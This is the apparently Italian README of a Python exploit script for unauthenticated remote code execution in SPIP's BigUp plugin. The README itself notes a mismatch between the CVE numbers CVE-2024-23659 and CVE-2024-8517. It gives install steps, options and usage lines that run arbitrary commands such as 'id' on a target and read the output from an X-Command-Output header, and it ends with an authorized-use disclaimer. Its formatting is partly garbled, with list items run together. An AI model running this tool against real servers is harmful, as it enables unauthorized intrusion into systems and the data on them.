
Script SPIP (CVE-2024-23659) con dipendenze native python3
Script in Python 3 per la validazione/sfruttamento di RCE non autenticato in SPIP BigUp (secondo il codice attuale, riferimento operativo a CVE-2024-8517).
⚠️ Nota importante: Il nome del repository menziona
CVE-2024-23659, ma lo script (cve.py) e i suoi messaggi interni fanno riferimento aCVE-2024-8517.
Verifica e unifica questo punto per evitare confusione tecnica.
cve.py automatizza:
formulaire_action e formulaire_action_args).X-Command-Output (base64).requestsbeautifulsoup4Installazione:
pip install requests beautifulsoup4
python3 cve.py -h
-u, --url (obbligatorio): URL base del targethttp://web.prod.local-c, --command: esegue un singolo comando e termina--proxy: proxy HTTP/HTTPS (es: http://127.0.0.1:8080)--timeout: timeout HTTP in secondi (default: 10)-v, --verbose: mostra i dettagli delle richiestepython3 cve.py -u http://objetivo.local
python3 cve.py -u http://objetivo.local -c "id"
python3 cve.py -u http://objetivo.local --proxy http://127.0.0.1:8080 -v
python3 cve.py -u http://objetivo.local --timeout 20
Objetivo vulnerable. Usuario web: <usuario>-v per vedere i dettagli HTTP.X-Command-Output non compare
--timeout.Questo repository e il suo contenuto sono forniti esclusivamente a scopo educativo, di ricerca e di test autorizzati.
L'uso di questo software contro sistemi senza autorizzazione esplicita è illegale e può costituire reato.
L'autore e i collaboratori non si assumono alcuna responsabilità per danni, interruzioni del servizio, perdita di dati, responsabilità legali o qualsiasi uso improprio derivante da questo strumento.
Utilizzando questo codice, accetti che:
Se non sei autorizzato, non usarlo.